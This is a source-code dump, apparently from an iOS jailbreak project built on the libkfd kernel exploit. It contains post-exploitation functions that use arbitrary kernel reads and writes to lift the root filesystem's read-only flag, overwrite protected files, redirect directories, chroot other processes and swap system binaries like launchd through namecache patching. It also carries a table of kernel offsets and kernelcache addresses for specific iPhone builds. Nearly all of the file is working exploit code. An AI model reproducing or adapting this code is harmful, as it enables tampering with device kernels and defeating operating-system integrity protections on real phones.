uint64_t textvp_pac = kread64(launchd_proc + off_p_textvp); uint64_t textvp = textvp_pac | base_pac_mask; NSLog(@"[i] launchd proc->textvp: 0x%llx\n", textvp); uint64_t textvp_nameptr = kread64(textvp + off_vnode_v_name); uint64_t textvp_name = kread64(textvp_nameptr); uint64_t devvp = kread64((kread64(textvp + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); uint64_t nameptr = kread64(devvp + off_vnode_v_name); uint64_t name = kread64(nameptr); char* devName = &name; NSLog(@"[i] launchd proc->textvp->v_name: %s, v_mount->mnt_devvp->v_name: %s", (char*)&textvp_name, devName); uint64_t sbin_vnode = kread64(textvp + off_vnode_v_parent) | base_pac_mask; textvp_nameptr = kread64(sbin_vnode + off_vnode_v_name); textvp_name = kread64(textvp_nameptr); devvp = kread64((kread64(textvp + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); nameptr = kread64(devvp + off_vnode_v_name); name = kread64(nameptr); devName = &name; NSLog(@"[i] launchd proc->textvp->v_parent->v_name: %s, v_mount->mnt_devvp->v_name:%s", (char*)&textvp_name, devName); uint64_t root_vnode = kread64(sbin_vnode + off_vnode_v_parent) | base_pac_mask; textvp_nameptr = kread64(root_vnode + off_vnode_v_name); textvp_name = kread64(textvp_nameptr); devvp = kread64((kread64(root_vnode + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); nameptr = kread64(devvp + off_vnode_v_name); name = kread64(nameptr); devName = &name; NSLog(@"[i] launchd proc->textvp->v_parent->v_parent->v_name: %s, v_mount->mnt_devvp->v_name:%s", (char*)&textvp_name, devName); NSLog(@"[+] rootvnode: 0x%llx", root_vnode); return root_vnode; } uint64_t funVnodeRedirectFolder(char* to, char* from) { uint64_t to_vnode = getVnodeAtPath(to); if(to_vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s\n", to); return -1; } uint8_t to_v_references = kread8(to_vnode + off_vnode_v_references); uint32_t to_usecount = kread32(to_vnode + off_vnode_v_usecount); uint32_t to_v_kusecount = kread32(to_vnode + off_vnode_v_kusecount); uint64_t orig_to_v_data = kread64(to_vnode + off_vnode_v_data); uint64_t from_vnode = getVnodeAtPath(from); if(from_vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", from); return -1; } //If mount point is different, return -1 uint64_t to_devvp = kread64((kread64(to_vnode + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); uint64_t from_devvp = kread64((kread64(from_vnode + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); if(to_devvp != from_devvp) { NSLog(@"[-] mount points of folders are different!"); return -1; } uint64_t from_v_data = kread64(from_vnode + off_vnode_v_data); kwrite32(to_vnode + off_vnode_v_usecount, to_usecount + 1); kwrite32(to_vnode + off_vnode_v_kusecount, to_v_kusecount + 1); kwrite8(to_vnode + off_vnode_v_references, to_v_references + 1); kwrite64(to_vnode + off_vnode_v_data, from_v_data); return orig_to_v_data; } uint64_t funVnodeOverwriteFile(char* to, char* from) { int to_file_index = open(to, O_RDONLY); if (to_file_index == -1) return -1; off_t to_file_size = lseek(to_file_index, 0, SEEK_END); int from_file_index = open(from, O_RDONLY); if (from_file_index == -1) return -1; off_t from_file_size = lseek(from_file_index, 0, SEEK_END); if(to_file_size < from_file_size) { close(from_file_index); close(to_file_index); NSLog(@"[-] File is too big to overwrite!"); return -1; } uint64_t proc = getProc(getpid()); //get vnode uint64_t filedesc_pac = kread64(proc + off_p_pfd); uint64_t filedesc = filedesc_pac | base_pac_mask; uint64_t openedfile = kread64(filedesc + (8 * to_file_index)); uint64_t fileglob_pac = kread64(openedfile + off_fp_glob); uint64_t fileglob = fileglob_pac | base_pac_mask; uint64_t vnode_pac = kread64(fileglob + off_fg_data); uint64_t to_vnode = vnode_pac | base_pac_mask; NSLog(@"[i] %s to_vnode: 0x%llx", to, to_vnode); uint64_t rootvnode_mount_pac = kread64(findRootVnode() + off_vnode_v_mount); uint64_t rootvnode_mount = rootvnode_mount_pac | base_pac_mask; uint32_t rootvnode_mnt_flag = kread32(rootvnode_mount + off_mount_mnt_flag); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag & ~MNT_RDONLY); kwrite32(fileglob + off_fg_flag, FREAD | FWRITE); uint32_t to_vnode_v_writecount = kread32(to_vnode + off_vnode_v_writecount); NSLog(@"[i] %s Increasing to_vnode->v_writecount: %d", to, to_vnode_v_writecount); if(to_vnode_v_writecount <= 0) { kwrite32(to_vnode + off_vnode_v_writecount, to_vnode_v_writecount + 1); NSLog(@"[+] %s Increased to_vnode->v_writecount: %d", to, kread32(to_vnode + off_vnode_v_writecount)); } char* from_mapped = mmap(NULL, from_file_size, PROT_READ, MAP_PRIVATE, from_file_index, 0); if (from_mapped == MAP_FAILED) { perror("[-] Failed mmap (from_mapped)"); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); close(from_file_index); close(to_file_index); return -1; } char* to_mapped = mmap(NULL, to_file_size, PROT_READ | PROT_WRITE, MAP_SHARED, to_file_index, 0); if (to_mapped == MAP_FAILED) { perror("[-] Failed mmap (to_mapped)"); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); close(from_file_index); close(to_file_index); return -1; } memcpy(to_mapped, from_mapped, from_file_size); NSLog(@"[i] msync ret: %d", msync(to_mapped, to_file_size, MS_SYNC)); munmap(from_mapped, from_file_size); munmap(to_mapped, to_file_size); kwrite32(fileglob + off_fg_flag, FREAD); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); close(from_file_index); close(to_file_index); return 0; } uint64_t funVnodeIterateByPath(char* dirname) { uint64_t vnode = getVnodeAtPath(dirname); if(vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", dirname); return -1; } uint64_t vp_nameptr = kread64(vnode + off_vnode_v_name); uint64_t vp_name = kread64(vp_nameptr); NSLog(@"[i] vnode->v_name: %s", (char*)&vp_name); //get child directory uint64_t vp_namecache = kread64(vnode + off_vnode_v_ncchildren_tqh_first); NSLog(@"[i] vnode->v_ncchildren.tqh_first: 0x%llx", vp_namecache); if(vp_namecache == 0) return 0; while(1) { if(vp_namecache == 0) break; vnode = kread64(vp_namecache + off_namecache_nc_vp); if(vnode == 0) break; vp_nameptr = kread64(vnode + off_vnode_v_name); char vp_name[256]; kreadbuf(vp_nameptr, &vp_name, 256); NSLog(@"[i] vnode->v_name: %s, vnode: 0x%llx", vp_name, vnode); vp_namecache = kread64(vp_namecache + off_namecache_nc_child_tqe_prev); } return 0; } uint64_t funVnodeIterateByVnode(uint64_t vnode) { uint64_t vp_nameptr = kread64(vnode + off_vnode_v_name); uint64_t vp_name = kread64(vp_nameptr); NSLog(@"[i] vnode->v_name: %s", (char*)&vp_name); //get child directory uint64_t vp_namecache = kread64(vnode + off_vnode_v_ncchildren_tqh_first); NSLog(@"[i] vnode->v_ncchildren.tqh_first: 0x%llx", vp_namecache); if(vp_namecache == 0) return 0; while(1) { if(vp_namecache == 0) break; vnode = kread64(vp_namecache + off_namecache_nc_vp); if(vnode == 0) break; vp_nameptr = kread64(vnode + off_vnode_v_name); char vp_name[256]; kreadbuf(vp_nameptr, &vp_name, 256); NSLog(@"[i] vnode->v_name: %s, vnode: 0x%llx", vp_name, vnode); vp_namecache = kread64(vp_namecache + off_namecache_nc_child_tqe_prev); } return 0; } uint64_t getVnodeVar(void) { return getVnodeAtPathByChdir("/private/var"); } uint64_t getVnodeVarMobile(void) { return getVnodeAtPathByChdir("/private/var/mobile"); } uint64_t getVnodePreferences(void) { return getVnodeAtPathByChdir("/private/var/mobile/Library/Preferences"); } uint64_t getVnodeLibrary(void) { return getVnodeAtPathByChdir("/private/var/mobile/Library");; } uint64_t getVnodeSystemGroup(void) { return getVnodeAtPathByChdir("/private/var/containers/Shared/SystemGroup"); } uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname) { uint64_t vp_nameptr = kread64(vnode + off_vnode_v_name); uint64_t vp_name = kread64(vp_nameptr); uint64_t vp_namecache = kread64(vnode + off_vnode_v_ncchildren_tqh_first); if(vp_namecache == 0) return 0; while(1) { if(vp_namecache == 0) break; vnode = kread64(vp_namecache + off_namecache_nc_vp); if(vnode == 0) break; vp_nameptr = kread64(vnode + off_vnode_v_name); char vp_name[256]; kreadbuf(vp_nameptr, &vp_name, 256); // NSLog(@"vp_name: %s\n", vp_name); if(strcmp(vp_name, childname) == 0) { return vnode; } vp_namecache = kread64(vp_namecache + off_namecache_nc_child_tqe_prev); } return 0; } uint64_t funVnodeRedirectFolderFromVnode(char* to, uint64_t from_vnode) { uint64_t to_vnode = getVnodeAtPath(to); if(to_vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", to); return -1; } uint8_t to_v_references = kread8(to_vnode + off_vnode_v_references); uint32_t to_usecount = kread32(to_vnode + off_vnode_v_usecount); uint32_t to_v_kusecount = kread32(to_vnode + off_vnode_v_kusecount); uint64_t orig_to_v_data = kread64(to_vnode + off_vnode_v_data); //If mount point is different, return -1 uint64_t to_devvp = kread64((kread64(to_vnode + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); uint64_t from_devvp = kread64((kread64(from_vnode + off_vnode_v_mount) | base_pac_mask) + off_mount_mnt_devvp); if(to_devvp != from_devvp) { NSLog(@"[-] mount points of folders are different!"); return -1; } uint64_t from_v_data = kread64(from_vnode + off_vnode_v_data); kwrite32(to_vnode + off_vnode_v_usecount, to_usecount + 1); kwrite32(to_vnode + off_vnode_v_kusecount, to_v_kusecount + 1); kwrite8(to_vnode + off_vnode_v_references, to_v_references + 1); kwrite64(to_vnode + off_vnode_v_data, from_v_data); return orig_to_v_data; } uint64_t funVnodeUnRedirectFolder (char* to, uint64_t orig_to_v_data) { uint64_t to_vnode = getVnodeAtPath(to); if(to_vnode == -1) { NSLog(@"[-] Unable to get vnode, path: %s", to); return -1; } uint8_t to_v_references = kread8(to_vnode + off_vnode_v_references); uint32_t to_usecount = kread32(to_vnode + off_vnode_v_usecount); uint32_t to_v_kusecount = kread32(to_vnode + off_vnode_v_kusecount); kwrite64(to_vnode + off_vnode_v_data, orig_to_v_data); if(to_usecount > 0) kwrite32(to_vnode + off_vnode_v_usecount, to_usecount - 1); if(to_v_kusecount > 0) kwrite32(to_vnode + off_vnode_v_kusecount, to_v_kusecount - 1); if(to_v_references > 0) kwrite8(to_vnode + off_vnode_v_references, to_v_references - 1); return 0; } uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from) { int to_file_index = open(to, O_RDONLY); if (to_file_index == -1) return -1; int from_file_index = open(from, O_RDONLY); if (from_file_index == -1) return -1; off_t from_file_size = lseek(from_file_index, 0, SEEK_END); uint64_t proc = getProc(getpid()); //get vnode uint64_t filedesc_pac = kread64(proc + off_p_pfd); uint64_t filedesc = filedesc_pac | base_pac_mask; uint64_t openedfile = kread64(filedesc + (8 * to_file_index)); uint64_t fileglob_pac = kread64(openedfile + off_fp_glob); uint64_t fileglob = fileglob_pac | base_pac_mask; uint64_t vnode_pac = kread64(fileglob + off_fg_data); uint64_t to_vnode = vnode_pac | base_pac_mask; NSLog(@"[i] %s to_vnode: 0x%llx", to, to_vnode); kwrite32(fileglob + off_fg_flag, FREAD | FWRITE); uint32_t to_vnode_v_writecount = kread32(to_vnode + off_vnode_v_writecount); NSLog(@"[i] %s Increasing to_vnode->v_writecount: %d", to, to_vnode_v_writecount); if(to_vnode_v_writecount <= 0) { kwrite32(to_vnode + off_vnode_v_writecount, to_vnode_v_writecount + 1); NSLog(@"[+] %s Increased to_vnode->v_writecount: %d", to, kread32(to_vnode + off_vnode_v_writecount)); } char* from_mapped = mmap(NULL, from_file_size, PROT_READ, MAP_PRIVATE, from_file_index, 0); if (from_mapped == MAP_FAILED) { perror("[-] Failed mmap (from_mapped)"); close(from_file_index); close(to_file_index); return -1; } NSLog(@"[i] ftruncate ret: %d", ftruncate(to_file_index, 0)); NSLog(@"[i] write ret: %zd", write(to_file_index, from_mapped, from_file_size)); munmap(from_mapped, from_file_size); kwrite32(fileglob + off_fg_flag, FREAD); close(from_file_index); close(to_file_index); return 0; } uint64_t getVnodeAtPathByChdir(char *path) { printf("get vnode of %s", path); if(access(path, F_OK) == -1) { NSLog(@"accessing not OK"); return -1; } if(chdir(path) == -1) { printf("chdir not OK"); return -1; } uint64_t fd_cdir_vp = kread64(getProc(getpid()) + off_p_pfd + off_fd_cdir); chdir("/"); return fd_cdir_vp; } void ChangeDirFor(int pid, const char *where) { NSLog(@"change dir for pid %d", pid); uint64_t proc = getProc(pid); uint64_t vp = getVnodeAtPathByChdir(where); if (vp == -1) { vp = getVnodeAtPath(where); } NSLog(@"vp %llx\n", vp); kwrite64(proc + off_p_pfd + (off_fd_cdir + 0x8), vp); // rdir kwrite64(proc + off_p_pfd + (off_fd_cdir + 0x0), vp); // cdir uint32_t fd_flags = kread32(proc + off_p_pfd + 0x58); // flag fd_flags |= 1; // FD_CHROOT = 1; kwrite32(proc + off_p_pfd + 0x58, fd_flags); usleep(250); fd_flags &= ~1; // FD_CHROOT = 1; kwrite32(proc + off_p_pfd + 0x58, fd_flags); kwrite32(vp + off_vnode_v_usecount, 0x2000); // the usecount will be -1 after this and panic after a userspace reboot kwrite32(vp + off_vnode_v_iocount, 0x2000); } // try reading through vp_ncchildren of /sbin/'s vnode to find launchd's namecache // after that, kwrite namecache, vnode id -> thx bedtime / misfortune int SwitchSysBin(uint64_t vnode, char* what, char* with) { uint64_t vp_nameptr = kread64(vnode + off_vnode_v_name); uint64_t vp_namecache = kread64(vnode + off_vnode_v_ncchildren_tqh_first); if(vp_namecache == 0) return 0; while(1) { if(vp_namecache == 0) break; vnode = kread64(vp_namecache + off_namecache_nc_vp); if(vnode == 0) break; vp_nameptr = kread64(vnode + off_vnode_v_name); char vp_name[256]; kreadbuf(kread64(vp_namecache + 96), &vp_name, 256); // printf("vp_name: %s\n", vp_name); if(strcmp(vp_name, what) == 0) { uint64_t with_vnd = getVnodeAtPath(with); uint32_t with_vnd_id = kread64(with_vnd + 116); uint64_t patient = kread64(vp_namecache + 80); // vnode the name refers uint32_t patient_vid = kread64(vp_namecache + 64); // name vnode id printf("patient: %llx vid:%llx -> %llx\n", patient, patient_vid, with_vnd_id); kwrite64(vp_namecache + 80, with_vnd); kwrite32(vp_namecache + 64, with_vnd_id); return vnode; } vp_namecache = kread64(vp_namecache + off_namecache_nc_child_tqe_prev); } return 0; } ================================================ FILE: usprebooter/libkfd/common.h ================================================ /* * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ #ifndef common_h #define common_h #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef __OBJC__ void NSLog(CFStringRef, ...); #endif #define pages(number_of_pages) ((number_of_pages) * (ARM_PGBYTES)) #define min(a, b) (((a) < (b)) ? (a) : (b)) #define max(a, b) (((a) > (b)) ? (a) : (b)) typedef int8_t i8; typedef int16_t i16; typedef int32_t i32; typedef int64_t i64; typedef intptr_t isize; typedef uint8_t u8; typedef uint16_t u16; typedef uint32_t u32; typedef uint64_t u64; typedef uintptr_t usize; /* * Helper print macros. */ #if CONFIG_PRINT #define print(format, ...) NSLog(CFSTR(format), ##__VA_ARGS__) #else /* CONFIG_PRINT */ #define print(args...) #endif /* CONFIG_PRINT */ #define print_bool(name) print("[%s]: %s = %s", __FUNCTION__, #name, name ? "true" : "false") #define print_i8(name) print("[%s]: %s = %hhi", __FUNCTION__, #name, name) #define print_u8(name) print("[%s]: %s = %hhu", __FUNCTION__, #name, name) #define print_x8(name) print("[%s]: %s = %02hhx", __FUNCTION__, #name, name) #define print_i16(name) print("[%s]: %s = %hi", __FUNCTION__, #name, name) #define print_u16(name) print("[%s]: %s = %hu", __FUNCTION__, #name, name) #define print_x16(name) print("[%s]: %s = %04hx", __FUNCTION__, #name, name) #define print_i32(name) print("[%s]: %s = %i", __FUNCTION__, #name, name) #define print_u32(name) print("[%s]: %s = %u", __FUNCTION__, #name, name) #define print_x32(name) print("[%s]: %s = %08x", __FUNCTION__, #name, name) #define print_i64(name) print("[%s]: %s = %lli", __FUNCTION__, #name, name) #define print_u64(name) print("[%s]: %s = %llu", __FUNCTION__, #name, name) #define print_x64(name) print("[%s]: %s = %016llx", __FUNCTION__, #name, name) #define print_isize(name) print("[%s]: %s = %li", __FUNCTION__, #name, name) #define print_usize(name) print("[%s]: %s = %lu", __FUNCTION__, #name, name) #define print_xsize(name) print("[%s]: %s = %016lx", __FUNCTION__, #name, name) #define print_string(name) print("[%s]: %s = %s", __FUNCTION__, #name, name) #define print_message(format, ...) do { print("[%s]: " format, __FUNCTION__, ##__VA_ARGS__); } while (0) #define print_success(format, ...) do { print("[%s]: 🟢 " format, __FUNCTION__, ##__VA_ARGS__); } while (0) #define print_warning(format, ...) do { print("[%s]: 🟡 " format, __FUNCTION__, ##__VA_ARGS__); } while (0) #define print_failure(format, ...) do { print("[%s]: 🔴 " format, __FUNCTION__, ##__VA_ARGS__); } while (0) #define print_timer(tv) \ do { \ u64 sec = ((tv)->tv_sec); \ u64 msec = ((tv)->tv_usec) / 1000; \ u64 usec = ((tv)->tv_usec) % 1000; \ print_success("%llus %llums %lluus", sec, msec, usec); \ } while (0) #define print_buffer(uaddr, size) \ do { \ const u64 u64_per_line = 8; \ volatile u64* u64_base = (volatile u64*)(uaddr); \ u64 u64_size = ((u64)(size) / sizeof(u64)); \ for (u64 u64_offset = 0; u64_offset < u64_size; u64_offset++) { \ if ((u64_offset % u64_per_line) == 0) { \ print("[0x%04llx]: ", u64_offset * sizeof(u64)); \ } \ print("%016llx", u64_base[u64_offset]); \ if ((u64_offset % u64_per_line) == (u64_per_line - 1)) { \ print("\n"); \ } else { \ print(" "); \ } \ } \ if ((u64_size % u64_per_line) != 0) { \ print("\n"); \ } \ } while (0) /* * Helper assert macros. */ #if CONFIG_ASSERT #define assert(condition) \ do { \ if (!(condition)) { \ print_failure("assertion failed: (%s)", #condition); \ print_failure("file: %s, line: %d", __FILE__, __LINE__); \ } \ } while (0) #else /* CONFIG_ASSERT */ #define assert(condition) #endif /* CONFIG_ASSERT */ #define assert_false(message) \ do { \ print_failure("error: %s", message); \ assert(false); \ } while (0) #define assert_bsd(statement) \ do { \ kern_return_t kret = (statement); \ if (kret != KERN_SUCCESS) { \ print_failure("bsd error: kret = %d, errno = %d (%s)", kret, errno, strerror(errno)); \ assert(kret == KERN_SUCCESS); \ } \ } while (0) #define assert_mach(statement) \ do { \ kern_return_t kret = (statement); \ if (kret != KERN_SUCCESS) { \ print_failure("mach error: kret = %d (%s)", kret, mach_error_string(kret)); \ assert(kret == KERN_SUCCESS); \ } \ } while (0) /* * Helper timer macros. */ #if CONFIG_TIMER #define timer_start() \ struct timeval tv_start; \ do { \ assert_bsd(gettimeofday(&tv_start, NULL)); \ } while (0) #define timer_end() \ do { \ struct timeval tv_end, tv_diff; \ assert_bsd(gettimeofday(&tv_end, NULL)); \ timersub(&tv_end, &tv_start, &tv_diff); \ print_timer(&tv_diff); \ } while (0) #else /* CONFIG_TIMER */ #define timer_start() #define timer_end() #endif /* CONFIG_TIMER */ /* * Helper allocation macros. */ #define malloc_bzero(size) \ ({ \ void* pointer = malloc(size); \ assert(pointer != NULL); \ bzero(pointer, size); \ pointer; \ }) #define bzero_free(pointer, size) \ do { \ bzero(pointer, size); \ free(pointer); \ pointer = NULL; \ } while (0) extern signed long long base_pac_mask; #endif /* common_h */ ================================================ FILE: usprebooter/libkfd/info/dynamic_info.h ================================================ #ifndef dynamic_info_h #define dynamic_info_h struct dynamic_info { const char* kern_version; const char* build_version; const char* device_id; // struct fileglob u64 fileglob__fg_ops; u64 fileglob__fg_data; // struct fileops u64 fileops__fo_kqfilter; // struct fileproc // u64 fileproc__fp_iocount; // u64 fileproc__fp_vflags; // u64 fileproc__fp_flags; // u64 fileproc__fp_guard_attrs; // u64 fileproc__fp_glob; // u64 fileproc__fp_guard; // u64 fileproc__object_size; // struct fileproc_guard u64 fileproc_guard__fpg_guard; // struct kqworkloop u64 kqworkloop__kqwl_state; u64 kqworkloop__kqwl_p; u64 kqworkloop__kqwl_owner; u64 kqworkloop__kqwl_dynamicid; u64 kqworkloop__object_size; // struct pmap u64 pmap__tte; u64 pmap__ttep; // struct proc u64 proc__p_list__le_next; u64 proc__p_list__le_prev; u64 proc__p_pid; u64 proc__p_fd__fd_ofiles; u64 proc__object_size; // struct pseminfo u64 pseminfo__psem_usecount; u64 pseminfo__psem_uid; u64 pseminfo__psem_gid; u64 pseminfo__psem_name; u64 pseminfo__psem_semobject; // struct psemnode // u64 psemnode__pinfo; // u64 psemnode__padding; // u64 psemnode__object_size; // struct semaphore u64 semaphore__owner; // struct specinfo u64 specinfo__si_rdev; // struct task u64 task__map; u64 task__threads__next; u64 task__threads__prev; u64 task__itk_space; u64 task__object_size; // struct thread u64 thread__task_threads__next; u64 thread__task_threads__prev; u64 thread__map; u64 thread__thread_id; u64 thread__object_size; // struct uthread u64 uthread__object_size; // struct vm_map_entry u64 vm_map_entry__links__prev; u64 vm_map_entry__links__next; u64 vm_map_entry__links__start; u64 vm_map_entry__links__end; u64 vm_map_entry__store__entry__rbe_left; u64 vm_map_entry__store__entry__rbe_right; u64 vm_map_entry__store__entry__rbe_parent; // struct vnode u64 vnode__v_un__vu_specinfo; // struct _vm_map u64 _vm_map__hdr__links__prev; u64 _vm_map__hdr__links__next; u64 _vm_map__hdr__links__start; u64 _vm_map__hdr__links__end; u64 _vm_map__hdr__nentries; u64 _vm_map__hdr__rb_head_store__rbh_root; u64 _vm_map__pmap; u64 _vm_map__hint; u64 _vm_map__hole_hint; u64 _vm_map__holes_list; u64 _vm_map__object_size; // kernelcache static addresses u64 kernelcache__kernel_base; u64 kernelcache__cdevsw; u64 kernelcache__gPhysBase; u64 kernelcache__gPhysSize; u64 kernelcache__gVirtBase; u64 kernelcache__perfmon_devices; u64 kernelcache__perfmon_dev_open; u64 kernelcache__ptov_table; u64 kernelcache__vm_first_phys_ppnum; u64 kernelcache__vm_pages; u64 kernelcache__vm_page_array_beginning_addr; u64 kernelcache__vm_page_array_ending_addr; u64 kernelcache__vn_kqfilter; }; const struct dynamic_info kern_versions[] = { // Start iPhone XS, XS Max, XR series // // Start iPhone XR // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0f5178, .kernelcache__gPhysBase = 0xfffffff0077ffc60, .kernelcache__gPhysSize = 0xfffffff0077ffc60 + 0x8, .kernelcache__gVirtBase = 0xfffffff0077fde40, .kernelcache__perfmon_devices = 0xfffffff00a130380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b3ac, .kernelcache__ptov_table = 0xfffffff0077b3248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a12f800, .kernelcache__vm_pages = 0xfffffff0077b0080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077b2208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a12f7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da44, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0f5178, .kernelcache__gPhysBase = 0xfffffff0077ffd48, .kernelcache__gPhysSize = 0xfffffff0077ffd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff0077fdf28, .kernelcache__perfmon_devices = 0xfffffff00a130380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b398, .kernelcache__ptov_table = 0xfffffff0077b3288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a12f800, .kernelcache__vm_pages = 0xfffffff0077b00c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077b2248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a12f7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da20, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, 